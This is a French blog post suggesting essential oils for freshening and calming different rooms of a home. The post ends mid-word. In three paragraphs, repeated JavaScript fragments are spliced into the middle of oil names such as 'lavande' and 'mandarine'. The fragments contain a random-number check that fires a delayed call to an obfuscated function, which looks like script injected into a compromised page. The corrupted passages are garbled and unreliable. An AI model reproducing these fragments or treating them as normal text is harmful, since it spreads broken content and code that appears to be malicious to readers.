6
oct

Envie de changer de maison ?

Découvrez-quelles-huiles-essentielles-utiliser-dans-votre-cuisine-séjour-chambre-à-coucher-et-même-au-bureau
Share on FacebookTweet about this on TwitterPin on PinterestShare on Google+

Qui dit nouveau look à la maison, ne veut pas forcément dire refaire toute la décoration... Avez-vous pensez aux huiles essentielles pour la maison ? En diffusion dans chaque pièce de votre maison, dotées de propriétés exceptionnelles, elles vous permettent de changer d'ambiance en quelques gouttes.

Découvrez quelles huiles essentielles utiliser dans votre cuisine, séjour, chambre à coucher et même au bureau !


Chassez les mauvaises odeurs de votre cuisine !

Le problème dans nos cuisines, ce sont les odeurs persistantes qui s’accrochent aux murs… Besoin d’une astuce simple et facile pour vous en débarrasser ? Pensez aux huiles essentielles !

Pour assainir et désinfecter tout en laissant un parfum frais, vous pouvez miser sur l’huile essentielle de lavandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andin : vous pouvez mettre quelques gouttes au fond de la poubelle ou dans l’eau que vous allez utiliser pour laver les sols.

Le réfrigérateur est aussi un autre point sensible : pour en chasser les odeurs tout en le purifiant, misez sur l’huile essentielle de citron. Quelques gouttes dans l’eau utilisez pour le nettoyage suffisent.


Et au fond des placards…

Pour vous débarrasser des petites bestioles qui se trouvent en général au fond de vos placards, vous pouvez compter sur les huiles essentielles : sur un galet, déposez quelques gouttes de HE de citron et de bois de cèdre… effet garanti ! 

Zen attitude dans le salon …

Faites de votre salon un espace de détente, un havre de paix propice à la relaxation en y diffusant de l’huile essentielle de bergamote, de patchouli ou d’encens.
Pas besoin de refaire la déco, il suffit juste de trouver votre huile essentielle préférée. N’hésitez pas à alterner les parfums pour varier les sensations.


Reposez-vous

Les huiles essentielles en diffusion dans votre chambre peuvent contribuer à améliorer la qualité de votre sommeil. Pour lâcher prise et vous décontracter, essayez l’huile essentielle de mandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andarine.

Vous avez mal du mal à trouver le sommeil, vos nuits sont agitées ? L’huile essentielle de lavandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande ou L’HE camomille romaine, selon vos goûts, vous aident à retrouver calme et sérénité.

En été, pour éloigner insectes, moustiques et même les araignées, préparez un spray 100% naturel à vaporiser dans l’encadrement de vos portes et fenêtres : quelques gouttes de HE de menthe poivrée, de cèdre et de lav